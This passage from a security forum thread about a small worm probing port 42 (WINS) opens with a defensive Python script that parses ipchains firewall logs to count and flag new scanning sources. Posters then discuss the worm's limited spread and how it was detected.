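The kernel log line quoted above is the ipchains "Packet log:" format, and the post's own check ("this IP has never scanned me before") is easy to automate. The following is an added example, not code from the thread: it parses lines of that format, counts TCP SYNs to 42/tcp per source, and lists sources that were not in a known set. The log lines embedded in it are constructed for the example, using RFC 5737 documentation addresses; 192.0.2.10 stands in for the redacted "(My IP)", and none of the sources are real scanners.

```python
import re
from collections import Counter

# Constructed log lines in the ipchains "Packet log:" format quoted in the
# thread. Addresses are from the RFC 5737 documentation ranges; 192.0.2.10
# stands in for the firewall's own IP. None of these are real scanners.
SAMPLE_LOG = """\
Jan  4 18:16:51 linux1 kernel: Packet log: input DENY eth0 PROTO=6 198.51.100.7:1265 192.0.2.10:42 L=48 S=0x80 I=54706 F=0x4000 T=112 SYN (#28)
Jan  4 18:16:54 linux1 kernel: Packet log: input DENY eth0 PROTO=6 198.51.100.7:1265 192.0.2.10:42 L=48 S=0x80 I=54710 F=0x4000 T=112 SYN (#28)
Jan  4 18:17:02 linux1 kernel: Packet log: input DENY eth0 PROTO=6 203.0.113.9:3163 192.0.2.10:42 L=48 S=0x00 I=1021 F=0x4000 T=118 SYN (#28)
Jan  4 18:17:05 linux1 kernel: Packet log: input DENY eth0 PROTO=17 203.0.113.9:1034 192.0.2.10:137 L=78 S=0x00 I=1022 F=0x0000 T=118 (#31)
Jan  4 18:17:09 linux1 kernel: Packet log: input DENY eth0 PROTO=6 198.51.100.7:1301 192.0.2.10:22 L=48 S=0x80 I=54720 F=0x4000 T=112 SYN (#28)
Jan  4 18:17:11 linux1 kernel: Packet log: input DENY eth0 PROTO=6 203.0.113.9:3164 192.0.2.10:42 L=48 S=0x00 I=1023 F=0x4000 T=118 SYN (#28)
"""

# Field layout of one ipchains Packet log line; the TCP flag word is optional
# (UDP and non-SYN lines have none).
LOG_LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) kernel: Packet log: "
    r"(?P<chain>\S+) (?P<action>\S+) (?P<iface>\S+) PROTO=(?P<proto>\d+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"L=(?P<length>\d+) S=(?P<tos>0x[0-9A-Fa-f]+) I=(?P<ipid>\d+) "
    r"F=(?P<frag>0x[0-9A-Fa-f]+) T=(?P<ttl>\d+)(?: (?P<flags>[A-Z]+))? \(#(?P<rule>\d+)\)\s*$"
)


def parse_line(line: str):
    """Return the fields of one Packet log line as a dict, or None if the line
    is not in that format. Numeric fields are converted to int."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    for key in ("proto", "sport", "dport", "length", "ipid", "ttl", "rule"):
        rec[key] = int(rec[key])
    rec["flags"] = rec["flags"] or ""
    return rec


def parse_log(text: str) -> list:
    """Parse every recognisable line; unrelated syslog lines are dropped."""
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def wins_probes(records: list, port: int = 42) -> Counter:
    """Count TCP SYNs to the WINS port (42/tcp by default) per source address."""
    hits = Counter()
    for r in records:
        if r["proto"] == 6 and r["dport"] == port and "SYN" in r["flags"]:
            hits[r["src"]] += 1
    return hits


def unseen_sources(records: list, known: set, port: int = 42) -> list:
    """Sources probing the port that are not in the set already seen: the
    'never scanned me before' check from the post, done over the whole log."""
    return sorted(src for src in wins_probes(records, port) if src not in known)


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print(wins_probes(recs))
    print(unseen_sources(recs, known={"198.51.100.7"}))
```

Persist the set returned by `wins_probes` between runs and feed it back as `known`, and the script reports only new scanners; filtering on proto 6 plus the SYN flag keeps UDP noise on other ports and stray RST or ACK packets out of the count.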

Link Logger (MVM, join:2001-03-29, Calgary, AB)
No port 42 traffic here today. This is a small time worm as there shouldn't be many systems on the internet using WINS, but it is the first new exploit worm in over 6 months, and a real bottom-of-the-barrel scraper at that.

Blake

Name Game (Premium Member, join:2002-07-07, Grand Rapids, MI)

said by Link Logger:

No port 42 traffic here today. This is a small time worm as there shouldn't be many systems on the internet using WINS, but it is the first new exploit worm in over 6 months, and a real bottom-of-the-barrel scraper at that.

Blake
It appears things are slowing down.

»isc.sans.org//port_detai ··· ?port=42

I sold my stock before the market crashed.

Link Logger (MVM, join:2001-03-29, Calgary, AB)

1 recommendation

The graph actually says it all, a handful of infected systems scanning lots of other systems.

One of my other IPs did see some port 42 scans this morning from 2 systems in New Jersey.

I have a binary capture of the worm here if anyone wants it to see what all it does to a system.

Blake

Name Game (Premium Member, join:2002-07-07, Grand Rapids, MI)

Thanks, Blake, for keeping your eye on this one. I am sure if it had gotten out of hand, you would be one of the first to sound the alert.

Link Logger (MVM, join:2001-03-29, Calgary, AB)

Actually Lawrence Baldwin over at MyNetwatchman gave me the heads up about this one, so then it only takes me a couple of minutes to set up PortPeeker and then from there I wait (actually I set up Link Logger to send me an email when something shows up on the desired port so I know to go and check PortPeeker). So really kudos would be better given to Lawrence and not me on this one.

Blake

Name Game (Premium Member, join:2002-07-07, Grand Rapids, MI)

said by Link Logger:

Actually Lawrence Baldwin over at MyNetwatchman gave me the heads up about this one, so then it only takes me a couple of minutes to set up PortPeeker and then from there I wait (actually I set up Link Logger to send me an email when something shows up on the desired port so I know to go and check PortPeeker). So really kudos would be better given to Lawrence and not me on this one.

Blake
Yup, that's for sure. :) He is probably out someplace getting interviewed, so pass on the coffee and donuts.

Link Logger (MVM, join:2001-03-29, Calgary, AB)

I posted my binary PortPeeker capture in the malware forum if anyone who is authorized to download stuff from there wants it. The only thing I ask is you post your analysis back to this thread.

Blake